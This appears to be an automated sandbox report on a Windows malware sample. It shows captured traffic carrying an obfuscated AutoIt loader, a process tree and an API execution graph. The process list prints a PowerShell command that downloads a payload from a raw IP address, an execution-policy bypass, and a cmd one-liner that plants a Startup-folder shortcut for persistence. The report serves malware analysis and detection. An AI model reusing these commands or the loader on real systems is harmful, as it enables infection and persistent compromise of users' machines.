                                                          Dec 18, 2024 09:32:38.999392033 CET1236INData Raw: 6e 65 4c 69 63 65 6e 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 42 61 73 6b 65 74 73 4e 65 61 72 43 75 62 61 20 3d 20 27 35 35 38 34 37 38 32 34 35 37 35 34 32 36 31 37 30 36 32 37 31 38 32 31 30 30 30 38 27 0a 24 48 65 72 65 62 79
                                                          Data Ascii: neLicense + 1EndIfWEnd$BasketsNearCuba = '5584782457542617062718210008'$HerebyFaq = 55$MultiCordlessFlexRepublicans = 73While 548If $HerebyFaq = 54 ThenACos(3326)ATan(8817)Dec(Wales("78]105]124]40]40]40]40",56/7))$HerebyFaq = $Hereb
                                                          Dec 18, 2024 09:32:38.999403954 CET1236INData Raw: 24 49 6d 6d 65 64 69 61 74 65 6c 79 4d 61 72 62 6c 65 49 6e 63 6f 72 70 6f 72 61 74 65 64 48 6f 75 72 20 3d 20 38 31 0a 24 61 70 70 72 6f 70 72 69 61 74 65 6c 6f 61 64 20 3d 20 38 31 0a 57 68 69 6c 65 20 39 33 33 0a 49 66 20 24 49 6d 6d 65 64 69
                                                          Data Ascii: $ImmediatelyMarbleIncorporatedHour = 81$appropriateload = 81While 933If $ImmediatelyMarbleIncorporatedHour = 80 ThenConsoleWriteError(Wales("91]110]125]106]114]119]70]93]130]121]110]70",9/1))DriveStatus(Wales("90]109]117]113]118]108]102]7
                                                          Dec 18, 2024 09:32:38.999623060 CET1236INData Raw: 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32 5d 39 39 5d 31 31 32 5d 31 31 38 5d 31 31 31 5d 31 30 31 5d 33 34 22 2c 32 2f 32 29
                                                          Data Ascii: 4]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102]99]112]118]111]101]34",2/2))$REJECTRESERVOIRLOCKENJOYED = $REJECTRESERVOIRLOCKENJOYED + 1EndIfIf $REJECTRESERVOIRLOCKENJOYED = 88 ThenExp(7839)Exp(4168)PixelGetColor(41, 632, 0)$REJ
                                                          Dec 18, 2024 09:32:39.119072914 CET1236INData Raw: 6c 65 67 61 6c 20 3d 20 32 37 20 54 68 65 6e 0a 41 53 69 6e 28 34 32 39 37 29 0a 41 54 61 6e 28 36 33 33 33 29 0a 46 69 6c 65 45 78 69 73 74 73 28 57 61 6c 65 73 28 22 36 38 5d 31 31 39 5d 31 31 38 5d 31 31 38 5d 31 31 33 5d 31 31 32 5d 33 35 5d
                                                          Data Ascii: legal = 27 ThenASin(4297)ATan(6333)FileExists(Wales("68]119]118]118]113]112]35]82]107]117]117]35]73]116]99]112]118]35]70]99]111]35",8/4))$DiscoIllegal = $DiscoIllegal + 1EndIfIf $DiscoIllegal = 28 ThenPixelGetColor(Wales("95]106]117]126


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\EO3RT0fEfb.exe"
                                                          Imagebase:0x7ff75f140000
                                                          File size:1'083'904 bytes
                                                          MD5 hash:DC83439D47B35F0556BEEDBC95C57FC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:03:32:36
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:32:36
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:32:41
                                                          Start date:18/12/2024
                                                          Path:C:\Users\Public\Guard.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                          Imagebase:0xb00000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:03:32:42
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:03:32:42
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:03:32:53
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                          Imagebase:0x7ff7b7690000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:03:32:53
                                                          Start date:18/12/2024
                                                          Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                          Imagebase:0x250000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:11%
                                                            Total number of Nodes:1418
                                                            Total number of Limit Nodes:40
                                                            execution_graph 93991 7ff75f19f890 94000 7ff75f14e18c 93991->94000 93993 7ff75f19f8a9 93995 7ff75f19f915 Concurrency::wait 93993->93995 94006 7ff75f162ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93993->94006 93998 7ff75f1a03e1 Concurrency::wait 93995->93998 94008 7ff75f1c34e4 77 API calls 3 library calls 93995->94008 93997 7ff75f19f8f6 93997->93995 94007 7ff75f1c1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93997->94007 94001 7ff75f14e1a7 94000->94001 94002 7ff75f14e1c2 94000->94002 94009 7ff75f14ee20 5 API calls Concurrency::wait 94001->94009 94004 7ff75f14e1af 94002->94004 94010 7ff75f14ee20 5 API calls Concurrency::wait 94002->94010 94004->93993 94006->93997 94008->93998 94009->94004 94010->94004 94011 7ff75f17c51c 94012 7ff75f17c567 94011->94012 94017 7ff75f17c52b fread_s 94011->94017 94019 7ff75f1755d4 15 API calls abort 94012->94019 94013 7ff75f17c54e HeapAlloc 94015 7ff75f17c565 94013->94015 94013->94017 94017->94012 94017->94013 94018 7ff75f16925c EnterCriticalSection LeaveCriticalSection fread_s 94017->94018 94018->94017 94019->94015 94020 7ff75f19b221 94021 7ff75f19b22a 94020->94021 94028 7ff75f150378 94020->94028 94043 7ff75f1b47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94021->94043 94023 7ff75f19b241 94044 7ff75f1b4708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94023->94044 94025 7ff75f19b264 94045 7ff75f153c20 94025->94045 94027 7ff75f19b292 94034 7ff75f150405 94027->94034 94066 7ff75f1d8d98 49 API calls Concurrency::wait 94027->94066 94037 7ff75f14f7b8 94028->94037 94031 7ff75f19b2d9 Concurrency::wait 94031->94028 94067 7ff75f1b47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94031->94067 94035 7ff75f15070a 94034->94035 94036 7ff75f14e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94034->94036 94068 7ff75f14ee20 5 API calls Concurrency::wait 94034->94068 94036->94034 94042 7ff75f14f7d5 94037->94042 94038 7ff75f14f7de 94038->94034 94041 7ff75f14f7b8 4 API calls 94041->94042 94042->94038 94042->94041 94069 7ff75f149640 94042->94069 94072 7ff75f14e0a8 94042->94072 94043->94023 94044->94025 94064 7ff75f153c80 94045->94064 94046 7ff75f1a05be 94088 7ff75f1c34e4 77 API calls 3 library calls 94046->94088 94048 7ff75f154a8f 94051 7ff75f154aa9 94048->94051 94052 7ff75f154ac0 94048->94052 94057 7ff75f19fefe 94048->94057 94050 7ff75f1a05d1 94050->94027 94051->94052 94055 7ff75f14e0a8 4 API calls 94051->94055 94052->94027 94053 7ff75f154fe7 94056 7ff75f14e0a8 4 API calls 94053->94056 94054 7ff75f153dde 94054->94027 94055->94054 94056->94054 94059 7ff75f14e0a8 4 API calls 94057->94059 94058 7ff75f14e0a8 4 API calls 94058->94064 94059->94052 94061 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94061->94064 94062 7ff75f149640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94062->94064 94063 7ff75f1650b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94063->94064 94064->94046 94064->94048 94064->94051 94064->94053 94064->94054 94064->94058 94064->94061 94064->94062 94064->94063 94065 7ff75f164f0c 34 API calls __scrt_initialize_thread_safe_statics 94064->94065 94086 7ff75f155360 300 API calls Concurrency::wait 94064->94086 94087 7ff75f1c34e4 77 API calls 3 library calls 94064->94087 94065->94064 94066->94031 94067->94031 94068->94034 94076 7ff75f164c68 94069->94076 94071 7ff75f149663 94071->94042 94073 7ff75f14e0bb 94072->94073 94074 7ff75f14e0b6 94072->94074 94073->94042 94085 7ff75f14f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94074->94085 94081 7ff75f164c2c 94076->94081 94077 7ff75f164c50 94077->94071 94081->94076 94081->94077 94082 7ff75f16925c EnterCriticalSection LeaveCriticalSection fread_s 94081->94082 94083 7ff75f165600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94081->94083 94084 7ff75f165620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94081->94084 94082->94081 94084->94081 94085->94073 94086->94064 94087->94064 94088->94050 94089 7ff75f168fac 94090 7ff75f16901c 94089->94090 94091 7ff75f168fd2 GetModuleHandleW 94089->94091 94106 7ff75f17b9bc EnterCriticalSection 94090->94106 94091->94090 94095 7ff75f168fdf 94091->94095 94093 7ff75f169026 94097 7ff75f1690a0 94093->94097 94103 7ff75f17aa8c 30 API calls 94093->94103 94105 7ff75f1690cb 94093->94105 94094 7ff75f17ba10 _isindst LeaveCriticalSection 94096 7ff75f1690f0 94094->94096 94095->94090 94107 7ff75f169164 GetModuleHandleExW 94095->94107 94098 7ff75f1690fc 94096->94098 94102 7ff75f169118 11 API calls 94096->94102 94099 7ff75f1690b8 94097->94099 94100 7ff75f17ada4 108 API calls 94097->94100 94101 7ff75f17ada4 108 API calls 94099->94101 94100->94099 94101->94105 94102->94098 94103->94097 94105->94094 94108 7ff75f16918e GetProcAddress 94107->94108 94109 7ff75f1691b5 94107->94109 94108->94109 94112 7ff75f1691a8 94108->94112 94110 7ff75f1691c5 94109->94110 94111 7ff75f1691bf FreeLibrary 94109->94111 94110->94090 94111->94110 94112->94109 94113 7ff75f152c17 94116 7ff75f1514a0 94113->94116 94115 7ff75f152c2a 94117 7ff75f1514d3 94116->94117 94118 7ff75f19be31 94117->94118 94120 7ff75f19bdf2 94117->94120 94121 7ff75f19bdd1 94117->94121 94149 7ff75f1514fa memcpy_s 94117->94149 94164 7ff75f1d8f48 300 API calls 3 library calls 94118->94164 94124 7ff75f19be19 94120->94124 94162 7ff75f1d9a88 300 API calls 4 library calls 94120->94162 94123 7ff75f19bddb 94121->94123 94121->94149 94161 7ff75f1d9514 300 API calls 94123->94161 94163 7ff75f1c34e4 77 API calls 3 library calls 94124->94163 94126 7ff75f151884 94152 7ff75f162130 45 API calls 94126->94152 94132 7ff75f151898 94132->94115 94137 7ff75f162130 45 API calls 94137->94149 94138 7ff75f151a30 45 API calls 94138->94149 94141 7ff75f19bfe4 94167 7ff75f1d93a4 77 API calls 94141->94167 94142 7ff75f151799 94150 7ff75f151815 94142->94150 94168 7ff75f1c34e4 77 API calls 3 library calls 94142->94168 94145 7ff75f153c20 300 API calls 94145->94149 94146 7ff75f14e0a8 4 API calls 94146->94149 94149->94126 94149->94137 94149->94138 94149->94141 94149->94142 94149->94145 94149->94146 94149->94150 94151 7ff75f14ef9c 46 API calls 94149->94151 94153 7ff75f1620d0 45 API calls 94149->94153 94154 7ff75f145af8 300 API calls 94149->94154 94155 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94149->94155 94156 7ff75f1635c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94149->94156 94157 7ff75f164f0c 34 API calls _onexit 94149->94157 94158 7ff75f1650b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94149->94158 94159 7ff75f1636c4 77 API calls 94149->94159 94160 7ff75f1637dc 300 API calls 94149->94160 94165 7ff75f14ee20 5 API calls Concurrency::wait 94149->94165 94166 7ff75f1aac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94149->94166 94150->94115 94151->94149 94152->94132 94153->94149 94154->94149 94156->94149 94157->94149 94159->94149 94160->94149 94161->94150 94162->94124 94163->94118 94164->94149 94165->94149 94166->94149 94167->94142 94168->94142 94169 7ff75f165328 94192 7ff75f164cac 94169->94192 94172 7ff75f165474 94223 7ff75f1657e4 7 API calls 2 library calls 94172->94223 94173 7ff75f165344 94175 7ff75f16547e 94173->94175 94177 7ff75f165362 94173->94177 94224 7ff75f1657e4 7 API calls 2 library calls 94175->94224 94178 7ff75f165387 94177->94178 94184 7ff75f1653a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94177->94184 94198 7ff75f17ada4 94177->94198 94179 7ff75f165489 abort 94181 7ff75f16540d 94206 7ff75f165930 94181->94206 94183 7ff75f165412 94209 7ff75f143730 94183->94209 94184->94181 94220 7ff75f169204 35 API calls __FrameHandler3::FrameUnwindToState 94184->94220 94189 7ff75f165435 94189->94179 94222 7ff75f164e90 8 API calls 2 library calls 94189->94222 94191 7ff75f16544c 94191->94178 94193 7ff75f164cce __scrt_initialize_crt 94192->94193 94225 7ff75f1665ec 94193->94225 94195 7ff75f164cd3 __scrt_initialize_crt 94196 7ff75f164cd7 94195->94196 94233 7ff75f166620 8 API calls 3 library calls 94195->94233 94196->94172 94196->94173 94199 7ff75f17ade0 94198->94199 94200 7ff75f17adff 94198->94200 94199->94200 94258 7ff75f141048 94199->94258 94263 7ff75f141080 94199->94263 94268 7ff75f141064 94199->94268 94273 7ff75f1410e8 94199->94273 94278 7ff75f16def8 94199->94278 94200->94184 94541 7ff75f166240 94206->94541 94210 7ff75f1437a3 94209->94210 94211 7ff75f143743 IsThemeActive 94209->94211 94221 7ff75f165974 GetModuleHandleW 94210->94221 94543 7ff75f1692d0 94211->94543 94217 7ff75f14377d 94555 7ff75f1437b0 94217->94555 94219 7ff75f143785 SystemParametersInfoW 94219->94210 94220->94181 94221->94189 94222->94191 94223->94175 94224->94179 94226 7ff75f1665f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94225->94226 94234 7ff75f167290 94226->94234 94230 7ff75f16660c 94231 7ff75f166603 94230->94231 94241 7ff75f1672d8 DeleteCriticalSection 94230->94241 94231->94195 94233->94196 94235 7ff75f167298 94234->94235 94237 7ff75f1672c9 94235->94237 94238 7ff75f1665ff 94235->94238 94242 7ff75f167614 94235->94242 94247 7ff75f1672d8 DeleteCriticalSection 94237->94247 94238->94231 94240 7ff75f167218 8 API calls 3 library calls 94238->94240 94240->94230 94241->94231 94248 7ff75f167310 94242->94248 94245 7ff75f167654 94245->94235 94246 7ff75f16765f InitializeCriticalSectionAndSpinCount 94246->94245 94247->94238 94249 7ff75f167371 94248->94249 94256 7ff75f16736c try_get_function 94248->94256 94249->94245 94249->94246 94250 7ff75f167454 94250->94249 94253 7ff75f167462 GetProcAddress 94250->94253 94251 7ff75f1673a0 LoadLibraryExW 94252 7ff75f1673c1 GetLastError 94251->94252 94251->94256 94252->94256 94254 7ff75f167473 94253->94254 94254->94249 94255 7ff75f167439 FreeLibrary 94255->94256 94256->94249 94256->94250 94256->94251 94256->94255 94257 7ff75f1673fb LoadLibraryExW 94256->94257 94257->94256 94287 7ff75f147718 94258->94287 94262 7ff75f164f15 94262->94199 94306 7ff75f147920 94263->94306 94265 7ff75f14109e 94336 7ff75f164ebc 34 API calls _onexit 94265->94336 94267 7ff75f164f15 94267->94199 94410 7ff75f147ec0 94268->94410 94270 7ff75f14106d 94446 7ff75f164ebc 34 API calls _onexit 94270->94446 94272 7ff75f164f15 94272->94199 94495 7ff75f161d80 94273->94495 94277 7ff75f164f15 94277->94199 94279 7ff75f16df03 94278->94279 94520 7ff75f17de20 94279->94520 94288 7ff75f149640 4 API calls 94287->94288 94289 7ff75f14778f 94288->94289 94295 7ff75f146f24 94289->94295 94292 7ff75f14782c 94293 7ff75f141051 94292->94293 94298 7ff75f147410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94292->94298 94294 7ff75f164ebc 34 API calls _onexit 94293->94294 94294->94262 94299 7ff75f146f60 94295->94299 94298->94292 94300 7ff75f146f52 94299->94300 94301 7ff75f146f85 94299->94301 94300->94292 94301->94300 94302 7ff75f146f93 RegOpenKeyExW 94301->94302 94302->94300 94303 7ff75f146faf RegQueryValueExW 94302->94303 94304 7ff75f146fdd 94303->94304 94305 7ff75f146ff5 RegCloseKey 94303->94305 94304->94305 94305->94300 94307 7ff75f147948 wcsftime 94306->94307 94308 7ff75f149640 4 API calls 94307->94308 94309 7ff75f147a02 94308->94309 94337 7ff75f145680 94309->94337 94311 7ff75f147a0c 94344 7ff75f163a38 94311->94344 94315 7ff75f147a2c 94360 7ff75f144680 94315->94360 94317 7ff75f147a3d 94318 7ff75f149640 4 API calls 94317->94318 94319 7ff75f147a47 94318->94319 94364 7ff75f14a854 94319->94364 94322 7ff75f18d05c RegQueryValueExW 94323 7ff75f18d08f 94322->94323 94324 7ff75f18d131 RegCloseKey 94322->94324 94325 7ff75f164c68 4 API calls 94323->94325 94326 7ff75f147a83 Concurrency::wait 94324->94326 94334 7ff75f18d147 wcscat Concurrency::wait 94324->94334 94327 7ff75f18d0b2 94325->94327 94326->94265 94328 7ff75f18d0bf RegQueryValueExW 94327->94328 94329 7ff75f18d0f3 94328->94329 94331 7ff75f18d112 94328->94331 94368 7ff75f147cf4 94329->94368 94331->94324 94333 7ff75f144680 4 API calls 94333->94334 94334->94326 94334->94333 94335 7ff75f149d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94334->94335 94378 7ff75f14ec00 94334->94378 94335->94334 94336->94267 94383 7ff75f188f90 94337->94383 94340 7ff75f14ec00 4 API calls 94341 7ff75f1456b4 94340->94341 94385 7ff75f1456d4 94341->94385 94343 7ff75f1456c1 Concurrency::wait 94343->94311 94345 7ff75f188f90 wcsftime 94344->94345 94346 7ff75f163a44 GetFullPathNameW 94345->94346 94347 7ff75f163a74 94346->94347 94348 7ff75f147cf4 4 API calls 94347->94348 94349 7ff75f147a1b 94348->94349 94350 7ff75f1471f8 94349->94350 94351 7ff75f14721c 94350->94351 94354 7ff75f18cd0c 94350->94354 94352 7ff75f147274 94351->94352 94357 7ff75f18cd66 memcpy_s 94351->94357 94404 7ff75f14b960 94352->94404 94356 7ff75f164c68 4 API calls 94354->94356 94355 7ff75f147283 memcpy_s 94355->94315 94356->94357 94358 7ff75f164c68 4 API calls 94357->94358 94359 7ff75f18cdda memcpy_s 94358->94359 94361 7ff75f1446c8 memcpy_s 94360->94361 94362 7ff75f14469f 94360->94362 94361->94317 94363 7ff75f164c68 4 API calls 94362->94363 94363->94361 94365 7ff75f14a87a 94364->94365 94367 7ff75f147a51 RegOpenKeyExW 94364->94367 94366 7ff75f164c68 4 API calls 94365->94366 94366->94367 94367->94322 94367->94326 94369 7ff75f147d0d 94368->94369 94370 7ff75f18d2c8 94368->94370 94373 7ff75f147d24 94369->94373 94376 7ff75f147d51 94369->94376 94371 7ff75f14dda4 4 API calls 94370->94371 94372 7ff75f18d2d3 94371->94372 94409 7ff75f147e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94373->94409 94375 7ff75f147d2f memcpy_s 94375->94331 94376->94372 94377 7ff75f164c68 4 API calls 94376->94377 94377->94375 94380 7ff75f14ec1d 94378->94380 94379 7ff75f19a5a2 94380->94379 94381 7ff75f164c68 4 API calls 94380->94381 94382 7ff75f14ec55 memcpy_s 94381->94382 94382->94334 94384 7ff75f14568c GetModuleFileNameW 94383->94384 94384->94340 94386 7ff75f188f90 wcsftime 94385->94386 94387 7ff75f1456e9 GetFullPathNameW 94386->94387 94388 7ff75f145712 94387->94388 94389 7ff75f18c03a 94387->94389 94391 7ff75f147cf4 4 API calls 94388->94391 94390 7ff75f14a854 4 API calls 94389->94390 94392 7ff75f14571c 94390->94392 94391->94392 94395 7ff75f14dda4 94392->94395 94394 7ff75f145785 94394->94343 94396 7ff75f14dda9 94395->94396 94398 7ff75f14ddc7 memcpy_s 94395->94398 94396->94398 94399 7ff75f14a7c0 94396->94399 94398->94394 94400 7ff75f14a7ed 94399->94400 94403 7ff75f14a7dd memcpy_s 94399->94403 94401 7ff75f18e7da 94400->94401 94402 7ff75f164c68 4 API calls 94400->94402 94402->94403 94403->94398 94405 7ff75f14b981 94404->94405 94408 7ff75f14b976 memcpy_s 94404->94408 94406 7ff75f18ef2a 94405->94406 94407 7ff75f164c68 4 API calls 94405->94407 94407->94408 94408->94355 94409->94375 94447 7ff75f1482b4 94410->94447 94413 7ff75f1482b4 4 API calls 94414 7ff75f147f3a 94413->94414 94415 7ff75f149640 4 API calls 94414->94415 94416 7ff75f147f46 94415->94416 94417 7ff75f147cf4 4 API calls 94416->94417 94418 7ff75f147f59 94417->94418 94454 7ff75f162d5c 6 API calls 94418->94454 94420 7ff75f147fa5 94421 7ff75f149640 4 API calls 94420->94421 94422 7ff75f147fb1 94421->94422 94423 7ff75f149640 4 API calls 94422->94423 94424 7ff75f147fbd 94423->94424 94425 7ff75f149640 4 API calls 94424->94425 94426 7ff75f147fc9 94425->94426 94427 7ff75f149640 4 API calls 94426->94427 94428 7ff75f14800f 94427->94428 94429 7ff75f149640 4 API calls 94428->94429 94430 7ff75f1480f7 94429->94430 94455 7ff75f15ef88 94430->94455 94432 7ff75f148103 94462 7ff75f15eec8 94432->94462 94434 7ff75f14812f 94435 7ff75f149640 4 API calls 94434->94435 94436 7ff75f14813b 94435->94436 94473 7ff75f156d40 94436->94473 94440 7ff75f1481ac 94441 7ff75f1481be GetStdHandle 94440->94441 94442 7ff75f18d350 94441->94442 94443 7ff75f148220 OleInitialize 94441->94443 94490 7ff75f1bffc8 CreateThread 94442->94490 94443->94270 94445 7ff75f18d367 CloseHandle 94446->94272 94448 7ff75f149640 4 API calls 94447->94448 94449 7ff75f1482c6 94448->94449 94450 7ff75f149640 4 API calls 94449->94450 94451 7ff75f1482cf 94450->94451 94452 7ff75f149640 4 API calls 94451->94452 94453 7ff75f147f2e 94452->94453 94453->94413 94454->94420 94456 7ff75f149640 4 API calls 94455->94456 94457 7ff75f15efa3 94456->94457 94458 7ff75f149640 4 API calls 94457->94458 94459 7ff75f15efac 94458->94459 94460 7ff75f149640 4 API calls 94459->94460 94461 7ff75f15f02e 94460->94461 94461->94432 94463 7ff75f15eede 94462->94463 94464 7ff75f149640 4 API calls 94463->94464 94465 7ff75f15eeea 94464->94465 94466 7ff75f149640 4 API calls 94465->94466 94467 7ff75f15eef6 94466->94467 94468 7ff75f149640 4 API calls 94467->94468 94469 7ff75f15ef02 94468->94469 94470 7ff75f149640 4 API calls 94469->94470 94471 7ff75f15ef0e 94470->94471 94472 7ff75f15ef68 RegisterWindowMessageW 94471->94472 94472->94434 94474 7ff75f156db9 94473->94474 94475 7ff75f156d80 94473->94475 94491 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94474->94491 94476 7ff75f14816b 94475->94476 94492 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94475->94492 94483 7ff75f1639a8 94476->94483 94484 7ff75f1aa502 94483->94484 94489 7ff75f1639cc 94483->94489 94493 7ff75f14ee20 5 API calls Concurrency::wait 94484->94493 94486 7ff75f1aa50e 94494 7ff75f14ee20 5 API calls Concurrency::wait 94486->94494 94488 7ff75f1aa52d 94489->94440 94490->94445 94493->94486 94494->94488 94496 7ff75f149640 4 API calls 94495->94496 94497 7ff75f161db2 GetVersionExW 94496->94497 94498 7ff75f147cf4 4 API calls 94497->94498 94500 7ff75f161dfc 94498->94500 94499 7ff75f14dda4 4 API calls 94499->94500 94500->94499 94501 7ff75f161e87 94500->94501 94502 7ff75f14dda4 4 API calls 94501->94502 94507 7ff75f161ea4 94502->94507 94503 7ff75f1a9645 94504 7ff75f1a964f 94503->94504 94518 7ff75f1b32f4 LoadLibraryA GetProcAddress 94504->94518 94505 7ff75f161f3c GetCurrentProcess IsWow64Process 94506 7ff75f161f7e memcpy_s 94505->94506 94506->94504 94509 7ff75f161f86 GetSystemInfo 94506->94509 94507->94503 94507->94505 94511 7ff75f1410f1 94509->94511 94510 7ff75f1a96b1 94512 7ff75f1a96b5 94510->94512 94513 7ff75f1a96d7 GetSystemInfo 94510->94513 94517 7ff75f164ebc 34 API calls _onexit 94511->94517 94519 7ff75f1b32f4 LoadLibraryA GetProcAddress 94512->94519 94516 7ff75f1a96bf 94513->94516 94515 7ff75f1a96f0 FreeLibrary 94515->94511 94516->94511 94516->94515 94517->94277 94518->94510 94519->94516 94539 7ff75f17b9bc EnterCriticalSection 94520->94539 94542 7ff75f165947 GetStartupInfoW 94541->94542 94542->94183 94601 7ff75f17b9bc EnterCriticalSection 94543->94601 94545 7ff75f1692e4 94546 7ff75f17ba10 _isindst 